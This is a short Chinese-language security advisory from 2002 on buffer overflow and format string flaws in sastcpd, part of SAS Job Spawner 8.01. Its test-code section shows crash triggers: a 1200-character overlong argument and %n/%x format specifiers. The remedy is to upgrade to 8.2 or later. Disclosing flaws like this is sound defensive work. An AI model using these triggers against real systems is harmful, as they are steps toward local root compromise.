sastcpd存在缓冲溢出和格式串漏洞

发布时间：2002-01-30
更新时间：2002-01-30
严重程度：高
威胁程度：本地管理员权限
错误类型：边界检查错误
利用方式：服务器模式

受影响系统

SAS Job Spawner for Open Systems version 8.01

详细描述
SAS软件提供数据分析，报告产生，企业级信息提送的解决方案，其中的"SAS Job Spawner", sastcpd存在缓冲溢出和格式串漏洞。

测试代码
$ sastcpd `perl -e "print 'A' x 1200"`
Invalid argument: AAAA[..cut..]AAAA.
Segmentation fault (core dumped)
$ ls -la core
-rw------- 1 root teknix 1454382 Jan 28 04:22 core
$ sastcpd %n
Segmentation fault (core dumped)
$ sastcpd %x
Invalid argument: 2.

解决方案
请使用8.2以上版本系统。

相关信息
Wodahs Latigid (wodahs@mail.com)
参考：http://archives.neohapsis.com/archives/bugtraq/2002-01/0352.html

最近严重漏洞

sastcpd存在缓冲溢出和格式串漏洞